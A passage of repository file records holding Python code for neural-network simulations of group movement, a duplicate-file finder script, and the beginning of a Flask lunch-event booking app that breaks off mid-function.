CircularCorridor()\n\n if not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n if not args.polar:\n cart_sim(model, setup, args)\n else:\n polar_sim(model, setup, args)\n"
},
{
"alpha_fraction": 0.5033050775527954,
"alphanum_fraction": 0.5222800970077515,
"avg_line_length": 34.62049865722656,
"blob_id": "0b4b1bcc2cdb886894789222252e9c0113789000",
"content_id": "857521b8f4c483ddcb7b0e2507a68ac4672ae947",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12859,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 361,
"path": "/find/simulation/tf_nn_functors.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom random import shuffle\nfrom find.models.tf_losses import logbound\n\n\nclass CircularCorridor:\n def __init__(self, radius=1.0, center=(0, 0)):\n self._center = center\n self._radius = radius\n\n def radius(self, position):\n return np.sqrt((position[0] - self._center[0]) ** 2 + (position[1] - self._center[1]) ** 2)\n\n def is_valid(self, radius):\n return radius < self._radius and radius > 0\n\n def center(self):\n return self._center\n\n\nsetup = CircularCorridor()\n\n\ndef _sample_valid_position(position, velocity, prediction, timestep, args):\n failed = 0\n (x_hat, y_hat) = (None, None)\n\n while True:\n g_x = np.random.normal(\n prediction[0, 0], prediction[0, 2] * args.var_coef, 1)[0]\n g_y = np.random.normal(\n prediction[0, 1], prediction[0, 3] * args.var_coef, 1)[0]\n\n vx_hat = velocity[0] + g_x\n vy_hat = velocity[1] + g_y\n x_hat = position[0] + vx_hat * timestep\n y_hat = position[1] + vy_hat * timestep\n r = np.sqrt((x_hat - setup.center()[0])\n ** 2 + (y_hat - setup.center()[1]) ** 2)\n dist = np.sqrt((x_hat - position[0])\n ** 2 + (y_hat - position[1]) ** 2)\n\n # if setup.is_valid(r): # and dist <= args.body_len / 2:\n if setup.is_valid(r) and dist <= 0.2:\n return np.array([x_hat, y_hat])\n else:\n failed += 1\n if failed > 999:\n prediction[:, 2] += 0.01\n prediction[:, 3] += 0.01\n\n\nclass ClosestIndividual:\n def __init__(self, args):\n self._args = args\n\n def sort(self, focal_id, individuals, simu):\n focal_idx = None\n for i, ind in enumerate(individuals):\n if ind.get_id() == focal_id:\n focal_idx = i\n break\n\n distance = []\n fpos = individuals[focal_id].get_position()\n for ind in individuals:\n pos = ind.get_position()\n distance.append(np.sqrt((pos[0] - fpos[0])\n ** 2 + (pos[1] - fpos[1]) ** 2))\n ind_idcs = [x for _, x in sorted(\n zip(distance, list(range(len(individuals)))))]\n ind_idcs.remove(focal_idx)\n\n return ind_idcs\n\n def select(self, focal_id, predictions, simu):\n return predictions[0]\n\n\nclass ShuffledIndividuals:\n def __init__(self, args):\n self._args = args\n\n def sort(self, focal_id, individuals, simu):\n ind_ids = list(range(len(individuals)))\n focal_idx = None\n for i, ind in enumerate(individuals):\n if ind.get_id() == focal_id:\n focal_idx = i\n break\n ind_ids.remove(focal_idx)\n shuffle(ind_ids)\n return ind_ids\n\n def select(self, focal_id, predictions, simu):\n pass\n\n\nclass HighestAcceleration:\n def __init__(self, args):\n self._args = args\n\n def sort(self, focal_id, individuals, simu):\n ind_ids = list(range(len(individuals)))\n focal_idx = None\n for i, ind in enumerate(individuals):\n if ind.get_id() == focal_id:\n focal_idx = i\n break\n ind_ids.remove(focal_idx)\n return ind_ids\n\n def select(self, focal_id, predictions, simu):\n inds = simu.get_individuals()\n minf_vec = []\n # vels = []\n # accs = []\n preds = []\n # for i in range(len(inds)):\n # if inds[i].get_id() == focal_id:\n # continue\n # v = inds[i].get_velocity()\n # vels.append(np.sqrt(v[0] ** 2 + v[1] ** 2))\n\n # a = inds[i].get_acceleration()\n # if a is not None:\n # accs.append(np.sqrt(a[0] ** 2 + a[1] ** 2))\n\n for p in predictions:\n preds.append(np.sqrt(p[0, 2] ** 2 + p[0, 3] ** 2))\n\n # if len(accs) == len(vels):\n # minf_vec = accs\n # else:\n # minf_vec = vels\n # minf_vec = accs\n # minf_vec = vels\n minf_vec = preds\n\n sorted_idcs = sorted(\n range(len(minf_vec)),\n key=lambda index: minf_vec[index],\n reverse=True\n )\n new_pred = predictions[sorted_idcs[0]]\n\n for i in range(1, self._args.num_neighs_consider):\n ind = sorted_idcs[i]\n new_pred[0, 0] += predictions[ind][0, 0]\n new_pred[0, 1] += predictions[ind][0, 1]\n new_pred[0, 2] += ((predictions[ind][0, 2]\n * self._args.var_coef) ** 2)\n new_pred[0, 3] += ((predictions[ind][0, 3]\n * self._args.var_coef) ** 2)\n new_pred[0, 0] /= self._args.num_neighs_consider\n new_pred[0, 1] /= self._args.num_neighs_consider\n new_pred[0, 2] = np.sqrt(\n new_pred[0, 2]) / (self._args.num_neighs_consider)\n new_pred[0, 3] = np.sqrt(\n new_pred[0, 2]) / (self._args.num_neighs_consider)\n\n return new_pred\n\n\nmost_influential_individual = {\n 'closest': ClosestIndividual,\n 'shuffled': ShuffledIndividuals,\n 'highest_acc': HighestAcceleration\n}\n\n\ndef get_most_influential_individual():\n return list(most_influential_individual.keys())\n\n\nclass Multi_pfw_predict:\n def __init__(self, model, args, num_neighs=1):\n self._model = model\n self._num_neighs = num_neighs\n self._selection_method = most_influential_individual[args.most_influential_individual](\n args)\n self._args = args\n\n def _compute_dist_wall(self, p):\n rad = 1 - np.array(np.sqrt(p[0] ** 2 + p[1] ** 2)).T\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n return rad\n\n def _compute_inter_dist(self, p1, p2):\n return np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = [\n focal.get_position()[0],\n focal.get_position()[1],\n focal.get_velocity()[0],\n focal.get_velocity()[1]]\n if self._args.distance_inputs:\n X.append(self._compute_dist_wall(focal.get_position()))\n\n ind_idcs = self._selection_method.sort(\n focal_id, individuals, simu, simu)\n for idx in ind_idcs:\n ind = individuals[idx]\n X = X + [\n ind.get_position()[0],\n ind.get_position()[1],\n ind.get_velocity()[0],\n ind.get_velocity()[1]]\n if self._args.distance_inputs:\n X.append(self._compute_dist_wall(ind.get_position()))\n X.append(self._compute_inter_dist(\n focal.get_position(),\n ind.get_position()))\n X = np.array(X)\n\n prediction = np.array(self._model.predict(X.reshape(1, X.shape[0])))\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n\n prediction = self._selection_method.select(focal_id, predictions, simu)\n return _sample_valid_position(focal.get_position(), focal.get_velocity(), prediction, simu.get_timestep(), self._args)\n\n\nclass Multi_plstm_predict:\n def __init__(self, model, num_timesteps, args, num_neighs=1):\n self._model = model\n self._num_timesteps = num_timesteps\n self._num_neighs = num_neighs\n self._selection_method = most_influential_individual[args.most_influential_individual](\n args)\n self._args = args\n self._means = [None]\n self._stds = [None]\n\n def get_means(self):\n return self._means\n\n def get_stds(self):\n return self._stds\n\n def _compute_dist_wall(self, p):\n rad = 1 - np.sqrt(p[:, 0] ** 2 + p[:, 1] ** 2).T\n zidcs = np.where(rad < 0)\n if len(zidcs[0]) > 0:\n rad[zidcs] = 0\n return rad\n\n def _compute_inter_dist(self, p1, p2):\n return np.sqrt((p1[:, 0] - p2[:, 0]) ** 2 + (p1[:, 1] - p2[:, 1]) ** 2)\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n if self._means[0] is None:\n self._means = [None] * len(simu.get_individuals())\n self._stds = [None] * len(simu.get_individuals())\n\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = np.empty((self._num_timesteps, 0))\n\n p1 = focal.get_position_history()\n v1 = focal.get_velocity_history()\n X = np.hstack((X, p1[-self._num_timesteps:, :]))\n X = np.hstack((X, v1[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p1[-self._num_timesteps:, :])\n X = np.hstack((X, rad.reshape(-1, 1)))\n\n predictions = []\n\n ind_idcs = self._selection_method.sort(focal_id, individuals, simu)\n for idx in ind_idcs:\n ind = individuals[idx]\n p2 = ind.get_position_history()\n v2 = ind.get_velocity_history()\n Xhat = np.hstack((X, p2[-self._num_timesteps:, :]))\n Xhat = np.hstack((Xhat, v2[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p2[-self._num_timesteps:, :])\n Xhat = np.hstack((Xhat, rad.reshape(-1, 1)))\n\n dist = self._compute_inter_dist(\n p1[-self._num_timesteps:, :],\n p2[-self._num_timesteps:, :])\n Xhat = np.hstack((Xhat, dist.reshape(-1, 1)))\n\n prediction = np.array(self._model.predict(\n Xhat.reshape(1, self._num_timesteps, Xhat.shape[1])))\n prediction[0, 2:] = list(map(logbound, prediction[0, 2:]))\n prediction[0, 2:] = list(map(np.exp, prediction[0, 2:]))\n predictions.append(prediction)\n\n prediction = self._selection_method.select(focal_id, predictions, simu)\n self._means[focal_id] = np.array([\n focal.get_position()[0] + (focal.get_velocity()\n [0] + prediction[0, 0]) * simu.get_timestep(),\n focal.get_position()[1] + (focal.get_velocity()\n [1] + prediction[0, 1]) * simu.get_timestep()\n ])\n self._stds[focal_id] = prediction[0, 2:] * self._args.var_coef\n\n return _sample_valid_position(focal.get_position(), focal.get_velocity(), prediction, simu.get_timestep(), self._args)\n\n\nclass Multi_plstm_predict_traj:\n def __init__(self, model, num_timesteps, args, num_neighs=1):\n self._model = model\n self._num_timesteps = num_timesteps\n self._num_neighs = num_neighs\n self._selection_method = most_influential_individual[args.most_influential_individual](\n args)\n self._args = args\n\n def __call__(self, focal_id, simu):\n individuals = simu.get_individuals()\n focal = list(filter(lambda x: x.get_id() == focal_id, individuals))[0]\n\n X = np.empty((self._num_timesteps, 0))\n\n p1 = focal.get_position_history()\n v1 = focal.get_velocity_history()\n X = np.hstack((X, p1[-self._num_timesteps:, :]))\n X = np.hstack((X, v1[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p1[-self._num_timesteps:, :])\n X = np.hstack((X, rad.reshape(-1, 1)))\n\n ind_idcs = self._selection_method.sort(focal_id, individuals, simu)\n for idx in ind_idcs:\n ind = individuals[idx]\n p2 = ind.get_position_history()\n v2 = ind.get_velocity_history()\n X = np.hstack((X, p2[-self._num_timesteps:, :]))\n X = np.hstack((X, v2[-self._num_timesteps:, :]))\n if self._args.distance_inputs:\n rad = self._compute_dist_wall(p2[-self._num_timesteps:, :])\n X = np.hstack((X, rad.reshape(-1, 1)))\n\n dist = self._compute_inter_dist(\n p1[-self._num_timesteps:, :],\n p2[-self._num_timesteps:, :])\n X = np.hstack((X, dist.reshape(-1, 1)))\n\n prediction = np.array(self._model.predict(\n X.reshape(1, self._num_timesteps, X.shape[1])))\n\n valid_predictions = []\n for i in range(prediction.shape[2]):\n pri = prediction[0, 0, i, :].reshape(1, prediction.shape[3])\n pri[0, 2:] = list(map(logbound, pri[0, 2:]))\n pri[0, 2:] = list(map(np.exp, pri[0, 2:]))\n valid_predictions.append(_sample_valid_position(focal.get_position(),\n pri, simu.get_timestep()), self._args)\n\n return valid_predictions\n"
},
{
"alpha_fraction": 0.5541760921478271,
"alphanum_fraction": 0.5598194003105164,
"avg_line_length": 43.29999923706055,
"blob_id": "370bde5e76e854364e8a7889dc0196180eca7148",
"content_id": "20fb3ef7ec4eab06c4bf4e41d705a9f124d520a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2658,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 60,
"path": "/find/simulation/nn_individual.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom find.simulation.simu.simulation.individual import Individual\n\n\nclass NNIndividual(Individual):\n def __init__(self, query_func, initial_pos=(0, 0), initial_vel=(0, 0)):\n # explicitly setting that this is not a robotic/virtual individual\n super().__init__(is_robot=True)\n self._query_func = query_func\n\n if initial_pos.ndim > 1:\n self._position_history = np.array(initial_pos)\n self._velocity_history = np.array(initial_vel)\n self._position = self._position_history[-1, :]\n self._velocity = self._velocity_history[-1, :]\n else:\n self._position = np.array(initial_pos)\n self._velocity = np.array(initial_vel)\n self._position_history = np.empty((0, len(self._position)))\n self._velocity_history = np.empty((0, len(self._velocity)))\n self._position_history = np.vstack(\n (self._position_history, self._position.reshape(1, -1)))\n self._velocity_history = np.vstack(\n (self._velocity_history, self._velocity.reshape(1, -1)))\n self._next_position = None\n self._next_velocity = None\n self._next_acceleration = None\n\n def get_functor(self):\n return self._query_func\n\n def interact(self, simu):\n # this should always be expressed in the next position TODO: maybe generalize ?\n self._next_position = self._query_func(self._id, simu)\n if type(self._next_position) is not list:\n self._next_velocity = (self._next_position -\n self._position) / simu.get_timestep()\n if self._velocity is not None:\n self._next_acceleration = (\n self._next_velocity - self._velocity) / simu.get_timestep()\n else:\n self._next_velocity = None\n\n def move(self, simu):\n # TODO: reconsider this logic\n # if type(self._next_position) is list or np.ndarray:\n # npos = self._next_position\n # for i in range(len(self._next_position)-1):\n # self._next_position = npos[i]\n # self._velocity = (self._next_position -\n # self._position) / simu.get_timestep()\n # self._history_update(simu)\n # self._position = npos[-1]\n # self._velocity = (self._next_position -\n # self._position) / simu.get_timestep()\n # else:\n self._position = self._next_position\n self._velocity = self._next_velocity\n self._acceleration = self._next_acceleration\n"
},
{
"alpha_fraction": 0.49381932616233826,
"alphanum_fraction": 0.5011093616485596,
"avg_line_length": 33.293479919433594,
"blob_id": "a4389f3fe59fd4982b89edd842dfaf1f1020bd9c",
"content_id": "4c36c23b39a7302da212d336744050dfc932289f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3155,
"license_type": "no_license",
"max_line_length": 178,
"num_lines": 92,
"path": "/find/plots/spatial/interindividual_distance.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.plots.common import *\n\n\ndef interindividual_distance(data, ax, args, clipping_range=[0.0, 0.6]):\n lines = ['-']\n linecycler = cycle(lines)\n ccycler = uni_cycler()\n for i, k in enumerate(sorted(data.keys())):\n vectors = data[k]\n cvector = []\n for v in vectors:\n cvector += v.tolist()\n\n print('Interindividual', k)\n print('LF: ', np.mean(cvector),\n np.std(cvector))\n ax = sns.kdeplot(cvector, ax=ax,\n color=next(ccycler), linestyle=next(linecycler), linewidth=uni_linewidth, label=k, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.3, cut=0)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = []\n for v in pos:\n matrix = np.loadtxt(v) * args.radius\n distance = np.sqrt(\n (matrix[:, 0] - matrix[:, 2]) ** 2 + (matrix[:, 1] - matrix[:, 3]) ** 2)\n data[e].append(distance)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n interindividual_distance(data, ax, args)\n\n ax.set_xlabel('Distance (m)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'interindividual_distance.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Interindividual distance figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
}
] | 66 |
UshieChris/AAPI | https://github.com/UshieChris/AAPI | 52a089596c7f3e30a9a227dc4d874bf98bdcb702 | be991d2224306f99941bac54eca91b459640af49 | 9a6cba35dce67807b018478fc3401f39d9f78eb2 | refs/heads/main | 2023-06-29T10:06:39.807364 | 2021-08-03T13:43:20 | 2021-08-03T13:43:20 | 392,330,624 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7861841917037964,
"alphanum_fraction": 0.7861841917037964,
"avg_line_length": 32.814815521240234,
"blob_id": "b16f00f5d53b5554dcdf647247bc8d1d3b9016f2",
"content_id": "766ddf43852fd09cf01ac6b461c78cb5395508d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 27,
"path": "/posts/views.py",
"repo_name": "UshieChris/AAPI",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.contrib.auth import get_user_model\n\nfrom django.contrib.auth import get_user_model\n\n# Create your views here.\nfrom rest_framework import generics, permissions\nfrom .permissions import IsAuthorOrReadOnly\nfrom .models import Post\nfrom .serializers import PostSerializer, UserSerializer\nclass PostList(generics.ListCreateAPIView):\n \n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = (IsAuthorOrReadOnly,)\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\nclass UserList(generics. ListCreateAPIView): # new\n queryset = get_user_model().objects.all()\n serializer_class = UserSerializer\n\nclass UserDetail(generics. RetrieveUpdateDestroyAPIView): # new\n queryset = get_user_model().objects.all()\n serializer_class = UserSerializer"
}
] | 1 |
markgruen/file_deduper | https://github.com/markgruen/file_deduper | b2a511a603a023f650065b436fe54cfefdf905a0 | 63e04cf687e3e554424c92d00476178b90508ed0 | b66dc9fe7289751acb51771458f479d29362c64c | refs/heads/master | 2021-08-19T10:08:39.527442 | 2017-11-25T19:55:47 | 2017-11-25T19:55:47 | 112,021,586 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7629629373550415,
"alphanum_fraction": 0.7814815044403076,
"avg_line_length": 89,
"blob_id": "6e8c7a9e18d3829b5e22bba923173b6a4949476e",
"content_id": "66aa4f430d2f1a4a19b0d52057a83908bb048976",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 253,
"num_lines": 3,
"path": "/README.md",
"repo_name": "markgruen/file_deduper",
"src_encoding": "UTF-8",
"text": "# file_deduper\n\nscript will find duplicate files in 3 passes. First builds a list of files by size and second compares the first 10K of the files hash to see if they are the same and last compare all the files with the same first 10K hash to see if the files are equal.\n"
},
{
"alpha_fraction": 0.4000000059604645,
"alphanum_fraction": 0.6499999761581421,
"avg_line_length": 12.666666984558105,
"blob_id": "a9bb163a6a3efcc58143367ec27f762f07b19d44",
"content_id": "b550a3617dbcb7cc90db5c89d74b03594e675ecf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "markgruen/file_deduper",
"src_encoding": "UTF-8",
"text": "tqdm==4.11.2\ndocopt==0.6.2\nschema==0.4.0"
},
{
"alpha_fraction": 0.5458219051361084,
"alphanum_fraction": 0.556790292263031,
"avg_line_length": 33.47263717651367,
"blob_id": "ad69e391bbe7193a63e398650f74d23e64b8e23c",
"content_id": "b421375b3518c5cf51c448b3d3adbf554e307961",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6929,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 201,
"path": "/file_deduper1.py",
"repo_name": "markgruen/file_deduper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env /usr/bin/python2.7\n\"\"\"\nUsage:\n file_deduper [--skip=SKIP | --skip-path=SKIPPATH] PATH...\n\nArguments:\n PATH Space separated list of path to check for duplicates\n\nOptions:\n -h --help show this help message and exit\n --skip SKIP Comma separated list of paths to skip\n --skip-path SKIPPATH File containing 1 path per line to skip\n\n\"\"\"\nimport sys\nimport os\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom docopt import docopt\nfrom schema import Schema, And, Optional, Or, Use, SchemaError\nimport hashlib\n\n__version__ = 0.1\n\n\ndef escape_filename(filename):\n return filename.replace(' ', '\\ ')\\\n .replace('[', '\\[')\\\n .replace(']', '\\]')\\\n .replace('(', '\\(')\\\n .replace(')', '\\)')\\\n .replace('&', '\\&')\\\n .replace('?', '\\?')\\\n .replace(\"'\", \"\\'\")\n \n\ndef chunk_reader(fobj, chunk_size=1024*256):\n \"\"\"Generator that reads a file in chunks of bytes\"\"\"\n while True:\n chunk = fobj.read(chunk_size)\n if not chunk:\n return\n yield chunk\n\n\n# TODO may want to increase first chuck to 50 to reduce 7359 matches on 10\ndef get_hash(filename, first_chunk_only=False, hash=hashlib.sha1):\n hashobj = hash()\n with open(filename, 'rb') as file_object:\n if first_chunk_only:\n hashobj.update(file_object.read(1024*1024))\n else:\n for chunk in chunk_reader(file_object):\n hashobj.update(chunk)\n hashed = hashobj.digest()\n return hashed\n\n\ndef skip_dir(thepath, skip_paths):\n skip = False\n thepath_parts = thepath.split(os.sep)\n for sp in skip_paths:\n l = len(sp.split(os.sep))\n if sp == os.sep.join(thepath_parts[0:l]):\n skip = True\n break\n return skip\n\n\ndef get_skips(args):\n if args['--skip']:\n skip_paths = args['--skip']\n elif args['--skip-path']:\n skip_paths = args['--skip-path'].read().splitlines()\n args['--skip-path'].close()\n else:\n skip_paths = ''\n return skip_paths\n\n\ndef check_for_duplicates(args, hash=hashlib.sha1):\n hashes_by_size = {}\n hashes_on_1k = {}\n hashes_full = {}\n skip_paths = None\n timing = []\n timing.append({})\n timing.append({})\n timing.append({})\n paths = args['PATH']\n skip_paths = get_skips(args)\n\n print('#Starting first scan by file size')\n print('#Checking root path: {} for duplicates'.format(paths[0]))\n timing[0]['start'] = datetime.now()\n for path in paths:\n print('# checking path: {}'.format(path))\n for dirpath, dirnames, filenames in os.walk(path):\n if skip_dir(dirpath, skip_paths):\n print(\"# skipping {}\".format(dirpath))\n continue\n for filename in filenames:\n full_path = os.path.join(dirpath, filename)\n try:\n file_size = os.path.getsize(full_path)\n except (OSError,):\n # not accessible (permissions, etc) - pass on\n pass\n\n duplicate = hashes_by_size.get(file_size)\n\n if duplicate:\n hashes_by_size[file_size].append(full_path)\n else:\n hashes_by_size[file_size] = [] # create the list for this file size\n hashes_by_size[file_size].append(full_path)\n timing[0]['end'] = datetime.now()\n print('#Completed first scan by file size: {} count: {}'.format(timing[0]['end']-timing[0]['start'], len(hashes_by_size)))\n\n # For all files with the same file size, get their hash on the 1st 1024 bytes\n print('#Starting second scan by small chunk size')\n timing[1]['start'] = datetime.now()\n for __, files in tqdm(hashes_by_size.items()):\n if len(files) < 2:\n continue # this file size is unique, no need to spend cpy cycles on it\n\n for filename in files:\n try:\n small_hash = get_hash(filename, first_chunk_only=True)\n except OSError, e:\n print(e)\n continue\n\n duplicate = hashes_on_1k.get(small_hash)\n if duplicate:\n hashes_on_1k[small_hash].append(filename)\n else:\n hashes_on_1k[small_hash] = [] # create the list for this 1k hash\n hashes_on_1k[small_hash].append(filename)\n timing[1]['end'] = datetime.now()\n print('#Completed second scan by small chunk size: {} count: {}'.format(timing[1]['end']-timing[1]['start'], len(hashes_on_1k)))\n\n # For all files with the hash on the 1st 1024 bytes, get their hash on the full file - collisions will be duplicates\n print('#Starting third scan by complete file')\n timing[2]['start'] = datetime.now()\n for __, files in tqdm(hashes_on_1k.items()):\n if len(files) < 2:\n continue # this hash of fist 1k file bytes is unique, no need to spend cpy cycles on it\n\n skip_files = ['txt','nfo']\n for filename in files:\n try:\n if filename.split('.')[-1].lower() in skip_files and duplicate.split('.')[-1].lower() in skip_files:\n continue\n except AttributeError, e:\n continue\n\n try:\n full_hash = get_hash(filename, first_chunk_only=False)\n except OSError, e:\n print(e)\n continue\n\n duplicate = hashes_full.get(full_hash)\n if duplicate:\n hashes_full[full_hash].append(filename)\n else:\n hashes_full[full_hash] = [] # create the list for dup files\n hashes_full[full_hash].append(filename)\n timing[2]['end'] = datetime.now()\n print('#Completed third scan by complete file: {} count {}'.format(timing[2]['end']-timing[2]['start'], len(hashes_full)))\n\n print('# List of duplicates')\n for __, files in hashes_full.items():\n if len(files) < 2:\n continue\n print('\\n'.join([escape_filename(f) for f in files]))\n print('')\n print('')\n print('Timing summary')\n print(' Scan building dict by file size: {} count {}'.format(timing[0]['end']-timing[0]['start'], len(hashes_by_size)))\n print(' Scan building dict by 1k hash: {} count {}'.format(timing[1]['end']-timing[1]['start'], len(hashes_on_1k)))\n print(' Scan building dict by all hash: {} count {}'.format(timing[2]['end']-timing[2]['start'], len(hashes_full)))\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version=__version__)\n print(args)\n print('')\n\n schema = Schema({\n 'PATH': And([os.path.isdir], error='Must be valid paths'),\n '--skip-path': Use(open),\n object: object\n })\n try:\n args = schema.validate(args)\n except SchemaError as e:\n sys.exit(e)\n\n check_for_duplicates(args)\n"
}
] | 3 |
hhagmans/mittach | https://github.com/hhagmans/mittach | b8b7bea3095a3cf342c291112cb51985bd9da2b6 | e8309b5f435bb2679b233bd1bfa7d6060d998e75 | f77538829afe23a73d5730986e63bfad0f39a2d3 | refs/heads/master | 2021-01-17T22:02:36.547614 | 2014-01-31T15:52:47 | 2014-01-31T15:52:47 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6198971271514893,
"alphanum_fraction": 0.6278331279754639,
"avg_line_length": 36.14858627319336,
"blob_id": "19a127cc2c0362f9f1763b27be3de46073bb9545",
"content_id": "efe3fb3087042788387e09a59d0572f6d7052113",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15768,
"license_type": "no_license",
"max_line_length": 424,
"num_lines": 424,
"path": "/mittach/web.py",
"repo_name": "hhagmans/mittach",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n\nfrom __future__ import absolute_import, division, with_statement\n\nimport os\n\nfrom datetime import date, datetime, timedelta\nfrom collections import defaultdict\nimport json\nfrom math import ceil\n\nfrom flask import Flask, g, request, url_for, make_response, redirect, abort, \\\n render_template, flash, render_template_string\n\nfrom .config import read_config\nfrom . import database\n\nfrom flask import current_app\n\nNAME = \"mittach\" # XXX: unnecessary?\nADMINS = [u\"co\", u\"hendrikh\", u\"anjaa\", u\"uschin\", u\"mkl\", u\"hendrik11\"]\nMAXEVENTS = 10 # Max events on one page\n\n\n\ndef debug():\n assert current_app.debug == False, u\"Don't panic! You're here by request of debug()\"\n\n\n\nclass RemoteUserMiddleware(object):\n \"\"\"\n WSGI middleware to inject a REMOTE_USER for debugging purposes\n \"\"\"\n\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n from getpass import getuser\n environ[\"REMOTE_USER\"] = getuser()\n return self.app(environ, start_response)\n\n\n# initialize application -- TODO: move into function in order to pass parameters like config location\napp = Flask(__package__, instance_relative_config=True)\nconfig = {\n \"mode\": os.environ.get(\"MITTACH_CONFIG_MODE\"), # XXX: hack for testing; this should not be necessary\n \"secret\": None\n}\nif not config[\"mode\"]:\n try:\n config = read_config(app.open_instance_resource(\"config.ini\"))\n except IOError: # XXX: temporary workaround until `__init__.py` is nothing but metadata\n import sys\n print >> sys.stderr, \"[WARNING] bootstrapping configuration\"\n config[\"mode\"] = \"development\"\napp.config.from_object(\"%s.config.%sConfig\" % (__package__, config[\"mode\"].capitalize()))\napp.config[\"MODE\"] = config[\"mode\"]\napp.config[\"SECRET_KEY\"] = config[\"secret\"]\nif app.debug:\n app.wsgi_app = RemoteUserMiddleware(app.wsgi_app)\n\n\[email protected]_request\ndef before_request():\n g.current_user = request.environ.get(\"REMOTE_USER\")\n if not g.current_user:\n abort(403)\n g.db = database.connect(app.config)\n\n last_month_end = date.today().replace(day=1) - timedelta(days=1)\n last_month_start = last_month_end.replace(day=1)\n g.last_month = {\n \"start\": str(last_month_start),\n \"end\": str(last_month_end),\n }\n g.last_month[\"name\"] = month_name(g.last_month[\"start\"], True)\n\n\[email protected]_request\ndef teardown_request(exc):\n pass # no need to explicitly close the database connection\n\n\[email protected](\"/\")\ndef root():\n return redirect(url_for(\"list_events\", page=1))\n\[email protected](\"/events\")\ndef root_events():\n return redirect(url_for(\"list_events\", page=1))\n\[email protected](\"/admin/<page>\")\ndef admin(page):\n if g.current_user in ADMINS:\n pages, sortedEvents = get_events_paginated(page,g.db)\n return render_template(\"admin.html\", events=sortedEvents, new_event={}, cpages=pages, current_page=int(page))\n else:\n return render_template_string(u'{% extends \"layout.html\" %} {% block alerts %}{% endblock %} {% block body %} <p>Du besitzt nicht die benötigten Rechte für diese Seite. <a href=\"{{ url_for(\"list_events\", page=1) }}\">Zurück zur Übersicht</a></p> {% endblock %}')\n\[email protected](\"/events/<page>\")\ndef list_events(page):\n pages, sortedEvents = get_events_paginated(page,g.db)\n return render_template(\"index.html\", events=sortedEvents, new_event={}, cpages=pages, current_page=int(page))\n\[email protected](\"/bookings/<event_id>\")\ndef list_bookings(event_id):\n 